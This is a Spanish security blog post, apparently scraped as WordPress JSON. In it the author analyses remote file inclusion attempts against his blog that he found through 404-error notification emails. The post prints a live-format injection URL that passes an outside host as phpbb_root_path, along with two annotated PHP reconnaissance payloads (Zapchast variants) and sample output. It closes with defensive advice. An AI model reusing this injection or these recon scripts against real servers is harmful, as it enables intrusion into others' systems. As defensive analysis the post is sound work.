Estos plugins<\/em> son muy ?tiles para detectar no s?lamente grandes cantidades de contenidos que se han vuelto inaccesibles, como sucede en un cambio de permalinks<\/a><\/em> o de directorios, sino para afinar y corregir enlaces rotos que por la raz?n que sea, han sido incluidos en los motores de b?squeda con nomenclaturas distintas a las actuales (por ejemplo, la antigua denominaci?n de categor?as del blog, ya que, por poner un ejemplo, lo que antes era http:\/\/www.sahw.com\/wp\/archivos\/category\/freestyle\/<\/a> ahora es http:\/\/www.sahw.com\/wp\/categorias\/freestyle\/<\/a>)<\/p>\n Pero este plugin<\/em> tiene otra funci?n interesante, y esa no es otra que identificar exploits<\/em>. Hoy vamos a ver un ejemplo real. Tengo que agradecer a SdP<\/acronym> su cooperaci?n, ya que mis nociones de Perl son limitadas, y sin embargo, las suyas son muy elevadas, y con su ayuda he podido generar un script que barra un fichero mbox<\/em> de Thunderbird donde conservo los mensajes de 404 notifier<\/em>, automatizando la extracci?n de hiperenlaces anidados en URLs leg?timas. Gracias :D<\/p>\n 1. Un ejemplo de un correo originado por 404 notifier<\/em> que contiene un enlace leg?timo<\/strong><\/p>\n Este es un ejemplo real de un correo del plugin, en el que como podemos ver, hay un informe de error 404 provocado por un usuario cuando intentaba acceder a un contenido:<\/p>\n Como resulta f?cil comprobar, aparece claramente una URL de destino http:\/\/www.sahw.com\/wp\/favicon.ico<\/a>. Efectivamente, si visit?is ese enlace, obtendremos un 404, porque no hay un favicon ah? alojado. El favicon<\/em> del dominio sahw.com est? alojado en http:\/\/www.sahw.com\/favicon.ico<\/a><\/p>\n 2. Un ejemplo de un correo originado por 404 notifier<\/em> que contiene un enlace malicioso<\/strong><\/p>\n Observad ahora este correo<\/a>. Como pod?is ver (es un ejemplo real, vivo en el momento de publicar esta informaci?n, aunque en la imagen no aparece completo), se advierte un error 404 al intentar acceder a la URL http:\/\/www.sahw.com\/wp\/archivos\/2005\/08\/12\/diez-razones-pa…r-en-internet-explorer-7\/\/modules\/PNphpBB2\/includes\/db.php?phpbb_root_path=http:\/\/www.bahai.org.ve\/\/sistem.txt?<\/strong><\/em>. Pero fijaos que el error lo provoca un intento de inyecci?n que, en ?ltima instancia, trataba de acceder a http:\/\/www.bahai.org.ve\/\/sistem.txt?<\/a>, direcci?n que al ser accedida muestra lo siguiente:<\/p>\n 3. Analizando<\/strong><\/p>\n ?Qu? pasa si cogemos un total de 707 mensajes generados por 404 notifier<\/em> y extraemos las URLs maliciosas que puedan contener. El resultado es este listado, en el que se enumeran 45 servidores comprometidos al servicio de los atacantes (en su mayor?a, vivos en el momento de publicar este art?culo)<\/p>\n Un porcentaje nada desde?able. El 6,3% de los errores 404 provocados en este blog procede de ataques, o si se prefiere, casi 7 de cada 100 accesos a contenidos inexistentes del blog no han sido provocados por la ausencia de contenidos, sino por la mala intenci?n de un grupo de atacantes.<\/p>\n 4. ?Y qu? hace ese c?digo que aparece anteriormente?<\/strong><\/p>\n Veamos el contenido<\/p>\n Una ejecuci?n tendr?a un aspecto similar al siguiente:<\/p>\n ALBANIA SoftWare: Apache 5. ?Cu?l es el mecanismo que los atacantes emplean para obtener la informaci?n t?cnica de un servidor?<\/strong><\/p>\n El ataque se fundamenta en lanzar contra listas ingentes de servidores inyecciones similares a la mostrada, con el objetivo de obtener informaci?n t?cnica de las m?quinas. Si consigo ejecutar en el servidor A (en este caso, lo intentaron contra mi blog) el c?digo malicioso ubicado en el servidor B (por ejemplo, el ejemplo de http:\/\/www.bahai.org.ve\/\/sistem.txt?<\/a>) los atacantes obtendr?an informaci?n t?cnica de mi servidor. Esto se basa en que algunos productos PHP, especialmente PHPNuke<\/a> y phpBB<\/a>, son susceptibles de este tipo de inyecciones, y permiten la ejecuci?n de c?digo malicioso inyectado desde otros sitios web, previamente comprometidos para servir el c?digo a ejecutar. Y para colmo de males, ambos productos est?n muy extendidos, con lo que se trata de lanzar muchas peticiones, y luego recoger con la ca?a informaci?n de muchos servidores. Es una simple cuesti?n estad?stica, donde el ?nico coste que hay que poner en lo alto de la mesa es el ancho de banda para que un script Perl (casi todos los accesos ten?an User Agent<\/em> libwww-perl\/5.80) ejecute miles de intentos de inyecci?n contra miles de sitios cada d?a.<\/p>\n 6. ?Por qu? hacen esto?<\/strong><\/p>\n Obviamente, para obtener informaci?n t?cnica de servidores, que facilite ataques dirigidos posteriores. Por ejemplo, si de la ejecuci?n anterior obtenemos que el servidor 192.168.1.3 corre una versi?n de PHP (phpv: 5.2.4-2ubuntu5.3<\/em>) vulnerable, que lo es<\/a>, los atacantes ya tienen informaci?n suficiente para tratar de explotarlo, porque saben que en esa IP hay un producto susceptible de ataques.<\/p>\n Por otro lado, estas ejecuciones remotas permiten ir censando m?quinas, y generar datos suficientes para explotar versiones determinadas de PHP, o del propio servidor Web, cuando aparezcan nuevas versiones y las actuales queden obsoletas. Si hoy me hago una lista de versiones PHP actualizadas (5.2.6), y ma?ana aparece una versi?n 5.2.7 que corrige fallos de seguridad, ya tengo una lista de sitios que, en ausencia de actualizaci?n, son blancos ideales para ser atacados.<\/p>\n 7. ?Es esto algo nuevo?<\/strong><\/p>\n Lamentablemente, no. El ejemplo real que hemos visto lo bautiz? en su momento el laboratorio de Eset<\/a>, fabricante de NOD32, como PHP\/Zapchast.C<\/em>. Tiene otras denominaciones, y es un tipo de malware que lleva rondando la red, bajo este formato, desde m?s o menos abril de 2008.<\/p>\n Eso s?, el c?digo va cambiando. Mirad el ejemplo, tambi?n real, de http:\/\/motookazja.com.pl\/admin\/libs\/config.txt??<\/a>, donde se introducen nuevas variables informativas, como el espacio en disco:<\/p>\n 8. ?C?mo evitar se parte de la trama?<\/strong><\/p>\n Si administras un servidor Web, mant?n siempre actualizados el software base y todos los productos. Emplea contrase?as y protocolos de acceso seguros, para impedir que nadie aloje en tus p?ginas c?digo de este tipo.<\/p>\n Y revisa peri?dicamente los logs, para detectar patrones similares al descrito. No te queda otra :)<\/p>\n Un saludo,<\/p>\n","protected":false},"excerpt":{"rendered":" Hola, Recientemente instal? un plugin para WordPress que se llama 404 notifier. Este plugin es muy ?til, ya que para cada hit que provoque un error 404, el motor del blog me env?a un correo electr?nico informando de que alguien ha intentado acceder a un contenido sin ?xito. Estos plugins Leer texto completo<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[16],"tags":[350,351,349,205,348],"class_list":["post-2220","post","type-post","status-publish","format-standard","hentry","category-malware","tag-code-injection","tag-inyeccion-codigo","tag-php","tag-vulnerabilidades","tag-zapchastc"],"_links":{"self":[{"href":"https:\/\/www.sahw.com\/wp\/wp-json\/wp\/v2\/posts\/2220","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.sahw.com\/wp\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.sahw.com\/wp\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.sahw.com\/wp\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.sahw.com\/wp\/wp-json\/wp\/v2\/comments?post=2220"}],"version-history":[{"count":0,"href":"https:\/\/www.sahw.com\/wp\/wp-json\/wp\/v2\/posts\/2220\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.sahw.com\/wp\/wp-json\/wp\/v2\/media?parent=2220"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.sahw.com\/wp\/wp-json\/wp\/v2\/categories?post=2220"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.sahw.com\/wp\/wp-json\/wp\/v2\/tags?post=2220"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}![\"404](\"http:\/\/www.sahw.com\/images\/malware\/404legitimo.png\")
<\/p>\n![\"servidor](\"http:\/\/www.sahw.com\/images\/malware\/servidor_comprometido.png\")
<\/p>\n![\"servidores](\"http:\/\/www.sahw.com\/images\/malware\/listadourlsofuscadas.png\")
<\/p>\n\r\n< ?\r\necho \"ALBANIA\"; < --- texto libre del atacante\r\n$alb = @php_uname(); < --- devuelve una descripci?n del sistema operativo\r\n$alb2 = system(uptime); < -- devuelve el tiempo que lleva un sistema sin reiniciarse\r\n$alb3 = system(id); <-- imprime el UID de la cuenta con la que se ejecuta el script\r\n$alb4 = @getcwd(); <-- devuelve el directorio de trabajo\r\n$alb5 = getenv(\"SERVER_SOFTWARE\"); <-- variable de contorno que informa del tipo de servidor web y su versi?n\r\n$alb6 = phpversion(); <-- versi?n de PHP en ejecuci?n\r\n$alb7 = $_SERVER['SERVER_NAME']; <-- variable de contorno, devuelve el nombre de la m?quina, alias DNS o de la IP.\r\n$alb8 = gethostbyname($SERVER_ADDR); <-- variable de contorno, devuelve la IP del servidor\r\n$alb9 = get_current_user(); <-- usuario con el que se ejecuta un script PHP\r\n$os = @PHP_OS; <-- versi?n reducida de php_uname(), s?lo muestra el nombre del sistema operativo\r\n\r\n===========================================\r\nEl siguiente bloque s?lo imprime lo obtenido anteriormente\r\n===========================================\r\n\r\necho \"os: $os\";\r\necho \"uname -a: $alb\";\r\necho \"uptime: $alb2\";\r\necho \"id: $alb3\";\r\necho \"pwd: $alb4\";\r\necho \"user: $alb9\";\r\necho \"phpv: $alb6\";\r\necho \"SoftWare: $alb5\";\r\necho \"ServerName: $alb7\";\r\necho \"ServerAddr: $alb8\";\r\necho \"UNITED ALBANIANS aka ALBOSS PARADISE\"; < --- otra firma\r\nexit; <--- finaliza el script\r\n?><\/pre>\n
\n15:52:09 up 13 days, 22:05, 2 users, load average: 0.00, 0.01, 0.00 uid=33(www-data) gid=33(www-data) grupos=33(www-data) os: Linux
\nuname -a: Linux 2.6.24-21-generic #1 SMP Mon Aug 25 17:32:09 UTC 2008 i686
\nuptime: 15:52:09 up 13 days, 22:05, 2 users, load average: 0.00, 0.01, 0.00
\nid: uid=33(www-data) gid=33(www-data) grupos=33(www-data)
\npwd: \/home\/XXXXXXXX\/public_html\/exploitphp
\nuser: XXXXXXXX
\nphpv: 5.2.4-2ubuntu5.3<\/p>\n
\nServerName: 192.168.1.3
\nServerAddr:
\nUNITED ALBANIANS aka ALBOSS PARADISE<\/em><\/p><\/blockquote>\n\r\n< ?php\r\nfunction ConvertBytes($number)\r\n{\r\n $len = strlen($number);\r\n if($len < 4)\r\n {\r\n return sprintf(\"%d b\", $number);\r\n }\r\n if($len >= 4 && $len < =6)\r\n {\r\n return sprintf(\"%0.2f Kb\", $number\/1024);\r\n }\r\n if($len >= 7 && $len < =9)\r\n {\r\n return sprintf(\"%0.2f Mb\", $number\/1024\/1024);\r\n }\r\n \r\n return sprintf(\"%0.2f Gb\", $number\/1024\/1024\/1024);\r\n \r\n}\r\n\r\necho \"knowledgeteam
\";\r\n$un = @php_uname();\r\n$up = system(uptime);\r\n$id1 = system(id);\r\n$pwd1 = @getcwd();\r\n$sof1 = getenv(\"SERVER_SOFTWARE\");\r\n$php1 = phpversion();\r\n$name1 = $_SERVER['SERVER_NAME'];\r\n$ip1 = gethostbyname($SERVER_ADDR);\r\n$free1= diskfreespace($pwd1);\r\n$free = ConvertBytes(diskfreespace($pwd1));\r\nif (!$free) {$free = 0;}\r\n$all1= disk_total_space($pwd1);\r\n$all = ConvertBytes(disk_total_space($pwd1));\r\nif (!$all) {$all = 0;}\r\n$used = ConvertBytes($all1-$free1);\r\n$os = @PHP_OS;\r\n\r\n\r\necho \"knowledgeteam was here ..\";\r\necho \"uname -a: $un\";\r\necho \"os: $os\";\r\necho \"uptime: $up\";\r\necho \"id: $id1\";\r\necho \"pwd: $pwd1\";\r\necho \"php: $php1\";\r\necho \"software: $sof1\";\r\necho \"server-name: $name1\";\r\necho \"server-ip: $ip1\";\r\necho \"free: $free\";\r\necho \"used: $used\";\r\necho \"total: $all\";\r\nexit;\r\n<\/pre>\n